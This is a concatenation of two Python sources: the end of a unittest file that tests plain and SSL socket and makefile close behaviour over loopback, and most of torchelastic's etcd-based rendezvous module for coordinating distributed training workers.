self.assert_open(client_socket, fileno)
client_socket.close()
# Under Python 2, this closes the socket wrapper object but not the file descriptor;
# under Python 3, both stay open
if PY3:
self.assert_open(client_socket, fileno)
else:
self.assert_closed(client_socket)
self.assert_open(fileno)
f.close()
self.assert_closed(client_socket, fileno)
finally:
t.join()
listener.close()
def test_server_makefile2(self):
listener = socket.socket()
listener.bind(('127.0.0.1', 0))
port = listener.getsockname()[1]
listener.listen(1)
connector = socket.socket()
def connect():
connector.connect(('127.0.0.1', port))
t = threading.Thread(target=connect)
t.start()
try:
client_socket, _addr = listener.accept()
fileno = client_socket.fileno()
f = client_socket.makefile()
self.assert_open(client_socket, fileno)
# closing fileobject does not close the socket
f.close()
self.assert_open(client_socket, fileno)
client_socket.close()
self.assert_closed(client_socket, fileno)
finally:
t.join()
listener.close()
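# Note for newer interpreters: ssl.wrap_socket() (used throughout TestSSL below) is
# deprecated since Python 3.7 and removed in 3.12; the modern equivalent is to create an
# ssl.SSLContext and call its wrap_socket() method.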
class TestSSL(Test):
def test_simple_close(self):
s = self.make_open_socket()
fileno = s.fileno()
s = ssl.wrap_socket(s)
fileno = s.fileno()
self.assert_open(s, fileno)
s.close()
self.assert_closed(s, fileno)
def test_makefile1(self):
s = self.make_open_socket()
fileno = s.fileno()
s = ssl.wrap_socket(s)
fileno = s.fileno()
self.assert_open(s, fileno)
f = s.makefile()
self.assert_open(s, fileno)
s.close()
self.assert_open(s, fileno)
f.close()
self.assert_closed(s, fileno)
def test_makefile2(self):
s = self.make_open_socket()
fileno = s.fileno()
s = ssl.wrap_socket(s)
fileno = s.fileno()
self.assert_open(s, fileno)
f = s.makefile()
self.assert_open(s, fileno)
f.close()
# closing fileobject does not close the socket
self.assert_open(s, fileno)
s.close()
self.assert_closed(s, fileno)
def test_server_simple(self):
listener = socket.socket()
listener.bind(('127.0.0.1', 0))
port = listener.getsockname()[1]
listener.listen(1)
connector = socket.socket()
def connect():
connector.connect(('127.0.0.1', port))
ssl.wrap_socket(connector)
t = threading.Thread(target=connect)
t.start()
try:
client_socket, _addr = listener.accept()
client_socket = ssl.wrap_socket(client_socket, keyfile=certfile, certfile=certfile, server_side=True)
fileno = client_socket.fileno()
self.assert_open(client_socket, fileno)
client_socket.close()
self.assert_closed(client_socket, fileno)
finally:
t.join()
listener.close()
def test_server_makefile1(self):
listener = socket.socket()
listener.bind(('127.0.0.1', 0))
port = listener.getsockname()[1]
listener.listen(1)
connector = socket.socket()
def connect():
connector.connect(('127.0.0.1', port))
ssl.wrap_socket(connector)
t = threading.Thread(target=connect)
t.start()
try:
client_socket, _addr = listener.accept()
client_socket = ssl.wrap_socket(client_socket, keyfile=certfile, certfile=certfile, server_side=True)
fileno = client_socket.fileno()
self.assert_open(client_socket, fileno)
f = client_socket.makefile()
self.assert_open(client_socket, fileno)
client_socket.close()
self.assert_open(client_socket, fileno)
f.close()
self.assert_closed(client_socket, fileno)
finally:
t.join()
connector.close()
def test_server_makefile2(self):
listener = socket.socket()
listener.bind(('127.0.0.1', 0))
port = listener.getsockname()[1]
listener.listen(1)
connector = socket.socket()
def connect():
connector.connect(('127.0.0.1', port))
ssl.wrap_socket(connector)
t = threading.Thread(target=connect)
t.start()
try:
client_socket, _addr = listener.accept()
client_socket = ssl.wrap_socket(client_socket, keyfile=certfile, certfile=certfile, server_side=True)
fileno = client_socket.fileno()
self.assert_open(client_socket, fileno)
f = client_socket.makefile()
self.assert_open(client_socket, fileno)
# Closing fileobject does not close SSLObject
f.close()
self.assert_open(client_socket, fileno)
client_socket.close()
self.assert_closed(client_socket, fileno)
finally:
t.join()
listener.close()
connector.close()
def test_serverssl_makefile1(self):
listener = socket.socket()
fileno = listener.fileno()
listener.bind(('127.0.0.1', 0))
port = listener.getsockname()[1]
listener.listen(1)
listener = ssl.wrap_socket(listener, keyfile=certfile, certfile=certfile)
connector = socket.socket()
def connect():
connector.connect(('127.0.0.1', port))
ssl.wrap_socket(connector)
t = threading.Thread(target=connect)
t.start()
try:
client_socket, _addr = listener.accept()
fileno = client_socket.fileno()
self.assert_open(client_socket, fileno)
f = client_socket.makefile()
self.assert_open(client_socket, fileno)
client_socket.close()
self.assert_open(client_socket, fileno)
f.close()
self.assert_closed(client_socket, fileno)
finally:
t.join()
listener.close()
connector.close()
def test_serverssl_makefile2(self):
listener = socket.socket()
listener.bind(('127.0.0.1', 0))
port = listener.getsockname()[1]
listener.listen(1)
listener = ssl.wrap_socket(listener, keyfile=certfile, certfile=certfile)
connector = socket.socket()
def connect():
connector.connect(('127.0.0.1', port))
s = ssl.wrap_socket(connector)
s.sendall(b'test_serverssl_makefile2')
s.close()
connector.close()
t = threading.Thread(target=connect)
t.start()
try:
client_socket, _addr = listener.accept()
fileno = client_socket.fileno()
self.assert_open(client_socket, fileno)
f = client_socket.makefile()
self.assert_open(client_socket, fileno)
self.assertEqual(f.read(), 'test_serverssl_makefile2')
self.assertEqual(f.read(), '')
f.close()
if WIN and psutil:
# Hmm?
self.extra_allowed_open_states = (psutil.CONN_CLOSE_WAIT,)
self.assert_open(client_socket, fileno)
client_socket.close()
self.assert_closed(client_socket, fileno)
finally:
t.join()
listener.close()
if __name__ == '__main__':
unittest.main()
|
etcd_rendezvous.py
|
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree.
import datetime
import json
import logging
import random
import sys
import threading
import time
from base64 import b64decode, b64encode
from typing import Optional
import etcd
# pyre-ignore[21]: Could not find name `Store` in `torch.distributed`.
from torch.distributed import Store
from torchelastic.rendezvous import (
RendezvousClosedException,
RendezvousHandler,
RendezvousNonRetryableError,
RendezvousParameters,
RendezvousTimeoutException,
)
_log_fmt = logging.Formatter("%(levelname)s %(asctime)s %(message)s")
_log_handler = logging.StreamHandler(sys.stderr)
_log_handler.setFormatter(_log_fmt)
log = logging.getLogger(__name__)
log.propagate = False
log.setLevel(logging.INFO)
log.addHandler(_log_handler)
# A retryable failure exception means that we were too late to make
# a desired state transition (e.g. because of a race condition),
# and should now restart from the beginning.
# A small delay is recommended to avoid spamming Etcd.
class EtcdRendezvousRetryableFailure(Exception):
pass
# Similar to retryable failure, but the new state we observed suggests we
# can re-try immediately, i.e. without a need for "safety delay".
class EtcdRendezvousRetryImmediately(Exception):
pass
# Default overall timeout for rendezvous barrier.
CONST_DEFAULT_OVERALL_TIMEOUT = 600
# Additional waiting amount after reaching num_min_workers,
# for the case where the rendezvous is elastic (min != max):
CONST_DEFAULT_LAST_CALL_TIMEOUT = 30
# Various constants used internally in EtcdRendezvous
CONST_ETCD_SETUP_TTL = 5
CONST_ETCD_FROZEN_TTL = 10
CONST_ETCD_JOINABLE_EPHEMERAL_TTL = 10
# Ephemeral node TTL for worker's keep-alive key:
CONST_WORKER_KEEPALIVE_TTL = 10
# TTL for the ephemeral run_id-specific directory. All rendezvous state data
# for a specific run_id (job instance) is contained within this directory.
# Its only role is to clean up rendezvous data from old runs (for the case when
# the etcd server is persistent); it has no effect on correctness, but should be
# larger than any timeouts that a worker process is expected to survive:
CONST_RUNID_SUBROOT_TTL = 7200 # 2 hours
# Delay (sleep) for a small random amount to reduce CAS failures.
# This does not affect correctness, but will reduce requests to etcd server.
def cas_delay():
time.sleep(random.uniform(0, 0.1))
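# Typical usage pattern for cas_delay (a sketch, not part of the original control flow):
#   while True:
#       try:
#           ...  # read-modify-write of a rendezvous key, guarded by prevValue / prevIndex
#           break
#       except etcd.EtcdCompareFailed:
#           cas_delay()  # lost the compare-and-swap race; back off briefly and retry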
class EtcdRendezvousHandler(RendezvousHandler):
"""
Implements a :py:class:`torchelastic.rendezvous.RendezvousHandler`
interface backed by
:py:class:`torchelastic.rendezvous.etcd_rendezvous.EtcdRendezvous`.
Torchelastic uses a URL to configure the type of rendezvous to use and
to pass implementation specific configurations to the rendezvous module.
The basic etcd rendezvous configuration URL looks like the following
::
etcd://<etcd_address>:<port>/<job_id>?min_workers=<min_workers>&max_workers=<max_workers> # noqa W605
-- example --
etcd://localhost:2379/1234?min_workers=1&max_workers=3
The URL above is interpreted as follows:
1. Use the rendezvous handler that is registered with the ``etcd``
scheme
2. The ``etcd`` endpoint to use is ``localhost:2379``
3. ``job_id == 1234`` is used as the prefix in etcd (this allows one to
share a common etcd server for multiple jobs so long as the
``job_ids`` are guaranteed to be unique). Note that the job id can be
any string (e.g. does not need to be a number) as long as it is
unique.
4. ``min_workers=1`` and ``max_workers=3`` specifies a range for
membership size - torchelastic starts running the job as long as the
cluster size is greater than or equal to ``min_workers`` and admits
up to ``max_workers`` into the cluster.
Below are a full list of the parameters that can be passed to etcd
rendezvous:
+--------------------------------------------+--------------------------+
| Parameter | Description |
+============================================+==========================+
| min_workers | minimum number of |
| | workers for the |
| | rendezvous to be valid |
+--------------------------------------------+--------------------------+
| max_workers | maximum number of |
| | workers to admit |
+--------------------------------------------+--------------------------+
| timeout | total timeout within |
| | which next_rendezvous is |
| | expected to succeed |
| | (default 600s) |
+--------------------------------------------+--------------------------+
| last_call_timeout | additional wait amount |
| | (“last call”) after min |
| | number of workers has |
| | been reached (defaults |
| | to 30s) |
+--------------------------------------------+--------------------------+
| etcd_prefix | path prefix (from etcd |
| | root), inside which all |
| | etcd nodes will be |
| | created (defaults to |
| | ``/torchelastic/p2p``) |
+--------------------------------------------+--------------------------+
"""
def __init__(self, rdzv_impl):
self._rdzv_impl = rdzv_impl
def __del__(self):
# TODO: look into using weakref here instead.
del self._rdzv_impl
def next_rendezvous(self):
rdzv_version, rank, world_size = self._rdzv_impl.rendezvous_barrier()
log.info("Creating EtcdStore as the c10d::Store implementation")
store = self._rdzv_impl.setup_kv_store(rdzv_version)
return store, rank, world_size
def is_closed(self):
try:
_, state = self._rdzv_impl.get_rdzv_state()
return state["status"] == "closed"
except etcd.EtcdKeyNotFound:
# No rendezvous state, so it cannot be closed.
return False
def set_closed(self):
self._rdzv_impl.set_closed()
def num_nodes_waiting(self):
try:
_, state = self._rdzv_impl.get_rdzv_state()
if state["status"] == "final":
return state["num_workers_waiting"]
except etcd.EtcdKeyNotFound:
pass
return 0
def get_run_id(self) -> str:
return self._rdzv_impl._run_id
def shutdown(self) -> bool:
try:
self.set_closed()
return True
except BaseException as e:
log.warning(f"Shutdown failed. Error occurred: {str(e)}")
return False
# TODO: we should probably handle a few additional errors,
# like EtcdLeaderElectionInProgress and EtcdWatcherCleared. These are
# only relevant for multi-node Etcd ensemble. A simple retry would work,
# but is verbose to add everywhere. Consider wrapping the client calls
# into auto-retry for these errors?
#
class EtcdRendezvous(object):
"""
A rendezvous implementation that uses `etcd <https://etcd.io/>`__ as
the backend store.
"""
def __init__(
self,
endpoints,
prefix,
run_id,
num_min_workers,
num_max_workers,
timeout,
last_call_timeout,
**kwargs,
):
self._prefix = prefix
self._run_id = run_id
self._num_min_workers = num_min_workers
self._num_max_workers = num_max_workers
self._timeout = timeout
self._last_call_timeout = last_call_timeout
# For cleaning up TTL refresher threads (for ephemeral keys)
self._lease_run_id_stop = None
self._lease_this_rank_stop = None
if not self._prefix.endswith("/"):
self._prefix += "/"
self.client = etcd.Client(host=endpoints, allow_reconnect=True, **kwargs)
log.info("Etcd machines: " + str(self.client.machines))
# Setup a permanent prefix dir, if didn't exist
if self._prefix != "/":
self.create_path_if_not_exists(self._prefix)
# Lease a "sub-root" node specific to this job instance (run_id)
self.create_path_if_not_exists(self.get_path(""), ttl=CONST_RUNID_SUBROOT_TTL)
self._lease_run_id_stop = self.setup_lease_renewal(
self.get_path(""), ttl=CONST_RUNID_SUBROOT_TTL
)
# Subdir for all rendezvous work
self.create_path_if_not_exists(self.get_path("/rdzv"))
# Create a rendezvous version counter, if doesn't exist
try:
self.client.write(
key=self.get_path("/rdzv/version_counter"), value="0", prevExist=False
)
except etcd.EtcdAlreadyExist:
pass
def __del__(self):
# TODO: look into using weakref here instead.
if self._lease_run_id_stop is not None:
self._lease_run_id_stop.set()
if self._lease_this_rank_stop is not None:
self._lease_this_rank_stop.set()
def rendezvous_barrier(self):
"""
Main entry point for next rendezvous.
This method is blocking until rendezvous succeeds or a timeout occurs.
Returns:
``(rdzv_version, rank, world_size)``
Raises:
RendezvousTimeoutException - timeout waiting for rendezvous
RendezvousNonRetryableError - other persistent errors that
render the rendezvous non-retryable
RendezvousClosedException - rendezvous is or was closed while
waiting
"""
self._rendezvous_deadline = time.time() + self._timeout
while True:
if time.time() > self._rendezvous_deadline:
raise RendezvousTimeoutException()
log.info("Attempting to join next rendezvous")
try:
# Dis-own our lease in the previous rendezvous, if exists
if self._lease_this_rank_stop is not None:
self._lease_this_rank_stop.set()
return self.init_phase()
except EtcdRendezvousRetryImmediately:
# The type of failure suggests we can retry without delay
pass
except EtcdRendezvousRetryableFailure:
# In case of retryable failure, wait a small delay
# to avoid spamming etcd
time.sleep(1)
except RendezvousTimeoutException:
log.info("Rendezvous timeout occured in EtcdRendezvousHandler")
raise
except RendezvousClosedException:
log.info(
f"Rendezvous for run_id={self._run_id} was observed to be closed"
)
raise
except RendezvousNonRetryableError:
raise
except Exception as e:
# In case of a general exception, wait a small delay
# to avoid spamming etcd
# FIXME: there are a few things that fall under this like
# etcd.EtcdKeyNotFound, etc, which could be handled more explicitly.
log.info("Rendezvous attempt failed, will retry. Reason: " + str(e))
time.sleep(1)
def init_phase(self):
"""
Initially, the rendezvous state is expected to be one of:
1. empty (non-existent) - in this case we try to create a new one.
2. joinable - we try to join it.
3. final - we announce ourselves as waiting, and go into monitoring mode
Any other state is considered transitional, and will be retried after
a short delay.
Returns:
``(rdzv_version, rank, world_size)``
Raises:
RendezvousClosedException - current rendezvous was/is closed
EtcdRendezvousRetryableFailure - observed some intermediate
state, which is best handled by retrying later
"""
try:
active_version = self.try_create_rendezvous()
state = json.loads(active_version.value)
log.info("New rendezvous state created: " + str(state))
except etcd.EtcdAlreadyExist:
active_version, state = self.get_rdzv_state()
# Note: it is possible for above query to fail (etcd.EtcdKeyNotFound),
# but this is ok for us - just means we'll restart from beginning.
log.info("Observed existing rendezvous state: " + str(state))
if state["status"] == "closed":
raise RendezvousClosedException()
if state["status"] == "joinable":
return self.join_phase(state["version"])
if state["status"] == "final":
self.handle_existing_rendezvous(state["version"])
raise EtcdRendezvousRetryImmediately()
self.try_wait_for_state_change(etcd_index=active_version.etcd_index + 1)
raise EtcdRendezvousRetryableFailure()
def join_phase(self, expected_version):
"""
We observed a rendezvous state in the 'joinable' state; we attempt to join this
particular version, and then wait for all other peers to join.
"""
# Failure to join will propagate an exception, causing a re-entry.
active_version, this_rank = self.join_rendezvous(expected_version)
state = json.loads(active_version.value)
log.info(
"Joined rendezvous version {} as rank {}. Full state: {}".format(
state["version"], this_rank, state
)
)
# If this worker was first to reach num_min_workers requirement,
# and rendezvous is still joinable (therefore it is elastic),
# then this worker will be responsible for waiting out the "last call"
# timeout and closing (i.e. transitioning to 'frozen') the rendezvous
# afterwards.
# As a safety against a potential failure of this worker (during the
# last call timeout), the rendezvous state is made ephemeral
# when min_num_workers is reached.
if this_rank == self._num_min_workers - 1 and state["status"] == "joinable":
log.info("Rank {} is responsible for join last call.".format(this_rank))
last_call_deadline = time.time() + self._last_call_timeout
self.handle_join_last_call(expected_version, last_call_deadline)
log.info("Rank {} finished join last call.".format(this_rank))
# Wait for rendezvous state to be frozen, which means a fixed set of peers
log.info("Waiting for remaining peers.")
active_version = self.wait_for_peers(expected_version)
state = json.loads(active_version.value)
assert (
state["version"] == expected_version
), "Logic error: failed to observe version mismatch"
return self.confirm_phase(expected_version, this_rank)
def confirm_phase(self, expected_version, this_rank):
"""
Once the rendezvous state transitions from 'joinable' to 'frozen',
we have every participant confirm their membership and setup per-member
keep-alive TTL keys, and then wait for all other participants to confirm,
which would then successfully conclude this rendezvous.
"""
log.info("All peers arrived. Confirming membership.")
self.confirm_membership(expected_version, this_rank)
log.info("Waiting for confirmations from all peers.")
active_version = self.wait_for_final(expected_version)
state = json.loads(active_version.value)
log.info(
"Rendezvous version {} is complete. Final state: {}".format(
state["version"], state
)
)
# Rendezvous version number; our rank in it; world size
return state["version"], this_rank, len(state["participants"])
def handle_existing_rendezvous(self, expected_version):
"""
Handle the case when there's an existing (state 'final') rendezvous already
in place, and we have to announce ourselves waiting, and wait until
the next rendezvous opportunity.
"""
# If state is 'final' -> increment num_workers_waiting
# Then, observe state changes:
# 1. if it's no longer final -> bail out and re-try
# 2. if keep alives are missing, destroy it and bail out.
active_state = self.announce_self_waiting(expected_version)
log.info(
"Added self to waiting list. Rendezvous full state: {}".format(
active_state.value
)
)
self.wait_for_rendezvous_to_free(expected_version)
log.info("Previously existing rendezvous state changed. Will re-try joining.")
def try_create_rendezvous(self):
"""
Create new rendezvous state or raise an exception that indicates
an unexpected state (e.g. already exists)
Raises:
RendezvousNonRetryableError - on unexpected state
"""
# Initially active_version is ephemeral - this is to handle the
# possibility that we might fail to complete the setup transaction,
# i.e. the transition "setup" -> "joinable".
active_version = self.client.write(
key=self.get_path("/rdzv/active_version"),
value=json.dumps({"status": "setup"}),
prevExist=False,
ttl=CONST_ETCD_SETUP_TTL,
)
try:
version_counter = self.client.get(self.get_path("/rdzv/version_counter"))
version_counter.value = str(int(version_counter.value) + 1)
self.client.update(version_counter)
except (etcd.EtcdKeyNotFound, etcd.EtcdCompareFailed):
raise RendezvousNonRetryableError(
"Unexpected state of EtcdRendezvousHandler, worker needs to die."
)
# Any failure below results in declaring a retryable rendezvous failure.
# The ephemeral /rdzv/active_version will expire and someone can then
# re-try the setup process.
# Create directory node for participant data
self.client.write(
key=self.get_path("/rdzv/v_{}".format(version_counter.value)),
value=None,
dir=True,
prevExist=False,
)
# Publish rendezvous version and signal it is ready-to-be-joined.
# If rendezvous was set closed just before this, a retry will happen,
# where the closed condition will be handled.
return self.client.test_and_set(
key=self.get_path("/rdzv/active_version"),
value=json.dumps(
{
"status": "joinable",
"version": version_counter.value,
"participants": [],
}
),
prev_value=active_version.value,
)
def join_rendezvous(self, expected_version):
"""
Helper method for the join phase.
"""
# Use compare-and-swap to add self to rendezvous state:
while True:
cas_delay()
active_version, state = self.get_rdzv_state()
if state["status"] != "joinable":
raise EtcdRendezvousRetryableFailure(
"Rendezvous state became non-joinable before we could join. "
"Must join next one."
)
if state["version"] != expected_version:
raise EtcdRendezvousRetryImmediately(
"Rendezvous version changed. Must try join the new one."
)
assert (
len(state["participants"]) < self._num_max_workers
), "Logic error: joinable rendezvous should always have space left"
this_rank = len(state["participants"])
state["participants"].append(this_rank)
# When reaching min workers, or changing state to frozen, we'll set
# the active_version node to be ephemeral.
if len(state["participants"]) == self._num_max_workers:
state["status"] = "frozen"
state["keep_alives"] = []
set_ttl = CONST_ETCD_FROZEN_TTL
elif len(state["participants"]) >= self._num_min_workers:
set_ttl = CONST_ETCD_JOINABLE_EPHEMERAL_TTL
else:
set_ttl = None
try:
# Compare-and-swap.
active_version = self.client.test_and_set(
key=self.get_path("/rdzv/active_version"),
value=json.dumps(state),
prev_value=active_version.value,
ttl=set_ttl,
)
# We succeeded joining.
return active_version, this_rank
except etcd.EtcdCompareFailed:
log.info("Join rendezvous CAS unsuccessful, retrying")
def wait_for_peers(self, expected_version):
"""
Helper method for the join phase.
"""
active_version, state = self.get_rdzv_state()
while True:
if state["status"] == "frozen" and state["version"] == expected_version:
# Success, all peers arrived.
return active_version
elif state["status"] == "joinable" and state["version"] == expected_version:
# Continue waiting for any interesting events.
active_version, state = self.try_wait_for_state_change(
etcd_index=active_version.etcd_index + 1
)
else:
# No valid transition possible at this point
raise EtcdRendezvousRetryableFailure(
"Rendezvous state transition no longer possible. Must re-enter."
)
def confirm_membership(self, expected_version, this_rank):
"""
Helper method for the confirm phase
"""
# Compare-and-swap loop
while True:
cas_delay()
active_version, state = self.get_rdzv_state()
if state["status"] != "frozen":
raise EtcdRendezvousRetryImmediately(
"Rendezvous no longer frozen, before we confirmed. "
"Must join next one"
)
if state["version"] != expected_version:
raise EtcdRendezvousRetryImmediately(
"Rendezvous version changed. Must try join the new one."
)
this_lease_key = self.get_path(
"/rdzv/v_{}/rank_{}".format(expected_version, this_rank)
)
self.client.set(this_lease_key, value=None, ttl=CONST_WORKER_KEEPALIVE_TTL)
state["keep_alives"].append(this_lease_key)
if len(state["keep_alives"]) == len(state["participants"]):
# Everyone confirmed (this rank is last to do so)
state["status"] = "final"
state["num_workers_waiting"] = 0
finalize = True
else:
finalize = False
try:
# Compare-and-swap. If new state is still frozen, keep it ephemeral.
active_version = self.client.test_and_set(
key=self.get_path("/rdzv/active_version"),
value=json.dumps(state),
prev_value=active_version.value,
ttl=None if finalize else CONST_ETCD_FROZEN_TTL,
)
self._lease_this_rank_stop = self.setup_lease_renewal(
this_lease_key, ttl=CONST_WORKER_KEEPALIVE_TTL
)
return active_version
except etcd.EtcdCompareFailed:
log.info("Confirm membership CAS unsuccessful, retrying")
def wait_for_final(self, expected_version):
"""
Helper method for the confirm phase
"""
active_version, state = self.get_rdzv_state()
while True:
if state["status"] == "final" and state["version"] == expected_version:
# Success. This rendezvous is final, and we accept it.
return active_version
elif state["status"] == "frozen" and state["version"] == expected_version:
# Continue waiting for any interesting events.
active_version, state = self.try_wait_for_state_change(
etcd_index=active_version.etcd_index + 1
)
else:
# No valid transition possible at this point
raise EtcdRendezvousRetryableFailure(
"Rendezvous state transition no longer possible. Must re-enter."
)
def announce_self_waiting(self, expected_version):
"""
Announce this worker is waiting (via num_workers_waiting counter) to join next
rendezvous, but only if state and version match.
"""
while True:
cas_delay()
active_version, state = self.get_rdzv_state()
if state["status"] != "final" or state["version"] != expected_version:
raise EtcdRendezvousRetryImmediately()
# Increment counter to signal an additional waiting worker.
state["num_workers_waiting"] += 1
try:
active_version = self.client.test_and_set(
key=self.get_path("/rdzv/active_version"),
value=json.dumps(state),
prev_value=active_version.value,
)
return active_version
except etcd.EtcdCompareFailed:
log.info("Announce self as waiting CAS unsuccessful, retrying")
def wait_for_rendezvous_to_free(self, expected_version):
"""
When there's an existing valid rendezvous in state 'final', we have to
wait until the next opportunity to join.
Such opportunity may come from:
1. rendezvous state changed by someone else, in which case we unblock and retry.
2. rendezvous becomes invalid because at least one member failed to renew their
leased keep_alive node. We detect this, and destroy the rendezvous.
"""
active_version, state = self.get_rdzv_state()
while True:
if state["status"] != "final" or state["version"] != expected_version:
return
# Check if current rendezvous state is valid, in the sense that all
# its members are alive (renewing their lease).
# If not, try destroy this rendezvous, so a new one can be created.
alive_members = self.client.get(
self.get_path("/rdzv/v_{version}".format(version=expected_version))
)
keep_alive_keys = [ch.key for ch in alive_members.children]
for key in state["keep_alives"]:
if key not in keep_alive_keys:
# This participant didn't renew their lease. We'll declare this
# rendezvous version as dead (but only if it hadn't changed)
log.info("Keep-alive key {} is not renewed.".format(key))
log.info(
"Rendevous version {} is incomplete. ".format(expected_version)
)
log.info("Attempting to destroy it.")
# Compare-and-delete operation. Throws if compare failed,
# which means rendezvous was already destroyed/re-created/closed,
# and we can try to re-enter the barrier.
self.client.delete(
key=self.get_path("/rdzv/active_version"),
prevValue=active_version.value,
)
log.info(
"Destroyed rendezvous version {} successfully.".format(
expected_version
)
)
# We can return (and retry) immediately
return
# Existing rendezvous seems valid, no reason to destroy it.
# We just have to wait until something changes and re-check.
try:
overall_timeout = (
max(self._rendezvous_deadline - time.time(), 0.0) + 1.0
)
self.client.watch(
key=self.get_path("/rdzv"),
index=active_version.etcd_index + 1,
recursive=True,
timeout=overall_timeout,
)
except (etcd.EtcdEventIndexCleared, etcd.EtcdWatchTimedOut):
pass
if time.time() > self._rendezvous_deadline:
raise RendezvousTimeoutException()
active_version, state = self.get_rdzv_state()
def handle_join_last_call(self, expected_version, deadline):
"""
After we reach min number of workers, one particular worker takes on the
responsibility of waiting an additional timeout before closing the join window.
If the worker responsible for this fails, the rendezvous will be destroyed due
to expiring TTL, and the other participants will re-rendezvous.
Here we expect to see state <joinable, expected_version>
Exit gracefully if either:
1. state becomes <frozen, expected_version>
2. timeout happens (reaching deadline), in which case
we try the transition to <frozen, expected_version>
Exit with exception otherwise.
"""
active_version, state = self.get_rdzv_state()
while True:
if state["status"] == "frozen" and state["version"] == expected_version:
# Worker set became frozen before last-call timeout. This is possible
# when num_max_workers is reached before the timeout.
return
if state["status"] != "joinable" or state["version"] != expected_version:
raise EtcdRendezvousRetryableFailure(
"Rendezvous state transition no longer possible. Must re-enter."
)
# If timeout occurred, attempt a state transition (joinable -> frozen)
if time.time() >= deadline:
state["status"] = "frozen"
state["keep_alives"] = []
try:
active_version = self.client.test_and_set(
key=self.get_path("/rdzv/active_version"),
value=json.dumps(state),
prev_value=active_version.value,
ttl=CONST_ETCD_FROZEN_TTL,
)
# We successfully made this rendezvous frozen.
return
except etcd.EtcdCompareFailed:
log.info("Join last-call transition CAS unsuccessful. Will retry")
cas_delay()
active_version, state = self.get_rdzv_state()
continue
# Timeout did not occur, so we must refresh TTL, and wait for
# further changes. Note: we only want TTL to be refreshed if
# state is still joinable, hence we use CAS for that here,
# even though we don't change any of the data.
try:
active_version = self.client.test_and_set(
key=self.get_path("/rdzv/active_version"),
value=active_version.value,
prev_value=active_version.value,
ttl=CONST_ETCD_JOINABLE_EPHEMERAL_TTL,
)
# Minimize "oversleeping":
timeout = min(
CONST_ETCD_JOINABLE_EPHEMERAL_TTL / 2,
deadline - time.time() + 1.0, # Oversleeping by 1s is ok.
)
active_version, state = self.try_wait_for_state_change(
etcd_index=active_version.etcd_index + 1, timeout=timeout
)
except etcd.EtcdCompareFailed:
log.info("Join last-call TTL refresh CAS unsuccessful, will retry")
cas_delay()
active_version, state = self.get_rdzv_state()
def set_closed(self):
"""
Mark rendezvous 'closed' for current run_id, which is used to signal other
participants to not attempt to perform (re-)rendezvous. This is useful
when one of the workers decides the job is complete.
"""
while True:
active_version, state = self.get_rdzv_state()
if state["status"] == "closed":
# Already closed by someone else.
return
state["status"] = "closed"
try:
self.client.test_and_set(
key=self.get_path("/rdzv/active_version"),
value=json.dumps(state),
prev_value=active_version.value,
)
return
except etcd.EtcdCompareFailed:
log.info("Set closed CAS unsuccessful, retrying")
cas_delay()
def get_rdzv_state(self):
active_version = self.client.get(key=self.get_path("/rdzv/active_version"))
return active_version, json.loads(active_version.value)
def try_wait_for_state_change(self, etcd_index, timeout=None):
# Don't sleep past the overall deadline (by more than ~1s)
overall_timeout = max(self._rendezvous_deadline - time.time(), 0.0) + 1.0
timeout = overall_timeout if timeout is None else min(timeout, overall_timeout)
try:
self.client.watch(
self.get_path("/rdzv/active_version"), index=etcd_index, timeout=timeout
)
except (etcd.EtcdEventIndexCleared, etcd.EtcdWatchTimedOut):
pass
if time.time() > self._rendezvous_deadline:
raise RendezvousTimeoutException()
# Unfortunately, we have to do another fetch in order to get last etcd_index.
return self.get_rdzv_state()
def get_path(self, path):
if not path.startswith("/"):
path = "/" + path
return "{prefix}run_{run_id}{path}".format(
prefix=self._prefix, run_id=self._run_id, path=path
)
def create_path_if_not_exists(self, full_path, ttl=None):
try:
self.client.write(
key=full_path, value=None, dir=True, prevExist=False, ttl=ttl
)
except etcd.EtcdAlreadyExist:
pass
def setup_lease_renewal(self, full_path, ttl):
# NOTE: For ephemeral key TTL renewal (~lease) to work correctly,
# make sure you don't call any long-blocking methods that do not
# release Python's GIL! An example of this is calling a pybind11
# extension function that is blocking / long-running, but is not
# doing a scoped release of the GIL.
def lease_worker(client, path, ttl, stop_event):
while True:
try:
client.refresh(path, ttl=ttl)
except etcd.EtcdKeyNotFound:
break
if stop_event.wait(timeout=ttl / 2):
break
lease_stop_event = threading.Event()
lease_thread = threading.Thread(
target=lease_worker, args=(self.client, full_path, ttl, lease_stop_event)
)
lease_thread.daemon = True
lease_thread.start()
return lease_stop_event
def store_extra_data(self, rdzv_version, key, value):
node = self.get_path("/rdzv/v_{}/extra_data".format(rdzv_version))
try:
# If first time we are storing anything:
extra_data = self.client.write(
key=node, value=json.dumps({key: value}), prevExist=False
)
return
except etcd.EtcdAlreadyExist:
pass
# CAS loop, to make sure we don't lose concurrent stores.
while True:
# We never delete extra_data. Failure here should be fatal, no special handling.
extra_data = self.client.get(node)
new_extra_data_value = json.loads(extra_data.value)
new_extra_data_value[key] = value
try:
extra_data = self.client.test_and_set(
key=node,
value=json.dumps(new_extra_data_value),
prev_value=extra_data.value,
)
return
except etcd.EtcdCompareFailed:
log.info("Store extra_data CAS unsuccessful, retrying")
time.sleep(0.1)
def load_extra_data(self, rdzv_version, key, timeout=None):
# 'extra_data' node itself, and the directory it is located in:
node = self.get_path("/rdzv/v_{}/extra_data".format(rdzv_version))
node_dir = self.get_path("/rdzv/v_{}".format(rdzv_version))
# TODO: implement timeout
# https://github.com/pytorch/elastic/issues/12
while True:
# Combined wait for the node itself, and the key inside it.
root = self.client.get(node_dir)
# Find the extra_data node, if it exists
extra_data = [n for n in root.children if n.key == node]
assert len(extra_data) <= 1
# Node for extra_data exists, check the desired key inside it.
if len(extra_data) == 1:
extra_data_dict = json.loads(extra_data[0].value)
if key in extra_data_dict:
return extra_data_dict[key]
# The 'extra_data' node doesn't exist, or the key isn't published yet.
# Wait for interesting events on the extra_data node and retry.
try:
self.client.watch(node, index=root.etcd_index + 1)
except (etcd.EtcdEventIndexCleared, etcd.EtcdWatchTimedOut):
pass
def setup_kv_store(self, rdzv_version):
store_path = self.get_path(f"/rdzv/v_{rdzv_version}/kv")
self.create_path_if_not_exists(store_path)
return EtcdStore(etcd_client=self.client, etcd_store_prefix=store_path)
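# Minimal usage sketch (assuming an EtcdRendezvous instance `rdzv` was
# constructed elsewhere, e.g. via create_rdzv_handler() further below; the
# "master_addr" key/value is purely hypothetical):
#
#   rdzv_version, rank, world_size = rdzv.rendezvous_barrier()
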